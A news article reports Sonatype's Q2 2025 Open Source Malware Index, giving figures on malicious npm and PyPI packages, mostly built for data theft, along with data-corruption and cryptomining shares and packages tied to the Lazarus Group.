Open source has a malware problem, and it’s getting worse
The latest statistics from Sonatype, a leading provider of software security solutions, have revealed a concerning trend in the open source community. The Q2 2025 Open Source Malware Index reports a staggering 16,279 malicious open source packages across major ecosystems such as npm and PyPI. This brings the total number of malware packages discovered by the company to a whopping 845,204.
The alarming rise in detected malware is not limited to the sheer volume; it also indicates an increase in sophistication and scale of attacks targeting developers, software teams, and Continuous Integration/Continuous Deployment (CI/CD) pipelines. According to Brian Fox, CTO of Sonatype, "Attackers are no longer simply experimenting with open source. The numbers are telling us that threat actors have identified data as the most profitable target, and developers as the easiest way in."
Developers and security teams must be vigilant, as threats increasingly hide in plain sight within everyday tools and dependencies. The growing menace of malware in open source packages poses a significant risk to organizations relying on these ecosystems.
Data theft continues to be the most common goal behind malicious open source packages
In the second quarter of 2025, an impressive 55% of the threats found were built to steal sensitive information, including secrets, passwords, access tokens, API keys, and personal data. A staggering 4,400 packages were created specifically for this purpose.
These attacks often focus on tools and systems developers use, where stealing one piece of data can put entire systems at risk. The vulnerability lies in the fact that many attackers are using open source packages as a means to gain access to sensitive information without being detected.
Data corruption attacks are becoming more common
Researchers have also identified a sharp increase in malware designed to damage or interfere with data. These types of threats doubled from the previous quarter and now make up just over 3% of all malicious packages, with more than 400 identified in Q2.
These packages are built to corrupt files, inject harmful code, or disrupt software and infrastructure in other ways. The impact can be catastrophic, putting entire systems at risk.
Cryptomining malware is slightly less common
Malware that hijacks systems to mine cryptocurrency made up about 5% of the malicious packages found in Q2. This represents a small drop from earlier in the year.
The change may suggest that attackers are putting more effort into stealing credentials or gaining deeper access to systems instead of just using up resources.
Well-known threat groups are using open source at scale
Researchers linked 107 malicious packages to the Lazarus Group, a hacking group connected to the North Korean government. Those packages had more than 30,000 known downloads.
The findings show that advanced threat groups are using open source ecosystems to carry out spying, financial crime, and other long-term operations. This highlights the need for developers and security teams to be vigilant and proactive in protecting themselves against these sophisticated threats.
In conclusion, the growing menace of malware in open source packages demands immediate attention from developers, security teams, and organizations relying on these ecosystems. By understanding the nature of the threat and taking necessary precautions, we can mitigate the risks associated with open source and ensure a safer software development ecosystem.